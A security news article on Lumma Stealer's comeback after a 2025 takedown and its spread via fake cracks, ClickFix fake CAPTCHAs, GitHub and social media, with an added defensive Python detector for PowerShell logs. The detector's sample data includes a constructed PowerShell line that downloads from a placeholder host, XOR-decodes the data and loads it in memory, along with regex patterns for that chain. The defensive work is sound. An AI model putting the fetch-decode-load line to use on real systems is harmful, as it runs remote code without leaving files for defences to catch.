The Lumma Stealer malware suffered a massive takedown in May 2025, with over 2,300 malicious domains seized. But just weeks later, Trend Micro reports that Lumma is back.
According to the research team behind Trend Vision One, Lumma Stealer has “quickly reestablished operations and resumed previous targeting activity,” signaling not only resilience but also a significant tactical evolution. The malware is now being distributed via stealthier channels, exploiting cracked software, fake CAPTCHA sites, GitHub repositories, and even social media platforms.
In May 2025, a coordinated international effort involving law enforcement and private cybersecurity firms disrupted Lumma’s infrastructure. The operation included:
- Seizure of 2,300+ C2 domains
- Disruption of login panels and marketplaces
- Disconnection of infected endpoints from Lumma’s servers
Yet, the developer behind Lumma—part of a group Trend Micro tracks as Water Kurita—claimed on the XSS underground forum that “while the infrastructure was compromised, law enforcement did not physically confiscate their server.” Instead, it was accessed and wiped remotely, allegedly through a vulnerability in the Integrated Dell Remote Access Controller (iDRAC).
The attacker also revealed that their admin panel was replaced with a phishing site targeting clients’ IP addresses and webcams.
By June, just a month after the takedown, Lumma’s activity had already begun to rebound. Trend Micro’s telemetry revealed that the number of targeted accounts surged from June to July, and that the group had adopted a more covert infrastructure strategy:
- Reduced reliance on Cloudflare to avoid detection
- Increased use of Selectel and other Russian providers for hosting, making law enforcement tracking more difficult
“This strategic pivot suggests a move towards providers that might be perceived as less responsive to law enforcement requests,” Trend Micro explains.
Lumma Stealer is now distributed through a wide array of attack vectors, each exploiting users’ curiosity, convenience, or trust:
Fake Cracks and Keygens
Using search engine manipulation and malvertising, attackers lure victims looking for cracked software to malicious download sites. These sites use JavaScript redirection to a Traffic Distribution System (TDS), which fingerprints the user before delivering a password-protected Lumma downloader.
ClickFix Campaign
In this variant, fake CAPTCHA pages instruct victims to run PowerShell commands manually, triggering a multi-stage infection process. The downloaded PowerShell script:
- Decrypts a .NET binary via XOR
- Loads the payload directly into memory
- Executes Lumma without touching disk
“This process allows Lumma Stealer to run without saving any files to disk, making it much more difficult for traditional security tools to detect,” the report notes.
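Because the chain above never writes the payload to disk, the practical place to catch it is PowerShell ScriptBlock logging (Event ID 4104), which records the script text itself. The following Python snippet is an added example, not code from Trend Micro’s report: it runs a small indicator check over constructed script-block text and flags a block only when XOR decoding is paired with an in-memory .NET assembly load, so a benign script that merely uses -bxor is not flagged. The sample blocks and the example.invalid URL are constructed for illustration.

```python
import re

# Constructed PowerShell ScriptBlock log text (what Event ID 4104 records), not
# real Lumma samples: one benign admin script, one benign script that happens to
# use -bxor, and one ClickFix-style fragment shaped like the chain described
# above (download, XOR-decode, load a .NET assembly from memory).
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Remove-Item",
    "$c = 0; foreach ($b in [IO.File]::ReadAllBytes('C:\\data\\img.bin')) { $c = $c -bxor $b }; $c",
    "$b = (New-Object Net.WebClient).DownloadData('http://example.invalid/stage'); "
    "$p = New-Object byte[] $b.Length; for ($i = 0; $i -lt $b.Length; $i++) { $p[$i] = $b[$i] -bxor 0x5A }; "
    "[System.Reflection.Assembly]::Load($p)",
]

# Each indicator corresponds to one stage of the described infection chain.
INDICATORS = {
    "remote_fetch": re.compile(r"(?:Net\.WebClient|DownloadData|DownloadString|Invoke-WebRequest|\biwr\b)", re.I),
    "xor_decode": re.compile(r"-bxor\b", re.I),
    "in_memory_assembly_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\b", re.I),
}


def analyze_script_block(text):
    """Return the indicator names matched in one script block plus a verdict.

    XOR alone is a weak signal (legitimate scripts checksum with -bxor), so a
    block is flagged only when the decode stage is paired with an in-memory
    assembly load; a remote fetch on top of that marks the full described chain.
    """
    matched = [name for name, rx in INDICATORS.items() if rx.search(text)]
    flagged = "xor_decode" in matched and "in_memory_assembly_load" in matched
    return {"indicators": matched, "flagged": flagged,
            "full_chain": flagged and "remote_fetch" in matched}


def scan_script_blocks(blocks):
    """Return the index of every block that should raise an alert."""
    return [i for i, blk in enumerate(blocks) if analyze_script_block(blk)["flagged"]]


if __name__ == "__main__":
    for i, blk in enumerate(SAMPLE_SCRIPT_BLOCKS):
        print(i, analyze_script_block(blk))
```

In production the same check would run over 4104 events pulled from the endpoint or SIEM rather than over the constructed list.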
GitHub Repositories
Threat actors set up fake GitHub accounts with AI-generated README files promoting game cheats. The actual payload, often labeled innocently (e.g., TempSpoofer.exe), is hosted in the Releases section or directly downloadable.
Social Media Bait
On platforms like YouTube and Facebook, attackers promote “Photoshop cracks” or other pirated tools, linking viewers to sites.google.com pages that host the Lumma payload. Posts may include seemingly legitimate links but deliver hidden malware.
Lumma is part of the Malware-as-a-Service (MaaS) ecosystem, enabling even non-technical cybercriminals to run sophisticated information theft campaigns. Its capabilities include:
- Credential and cookie theft
- System fingerprinting
- File exfiltration
“Even cybercriminals with little to no technical knowledge can wield this malware,” warns the report.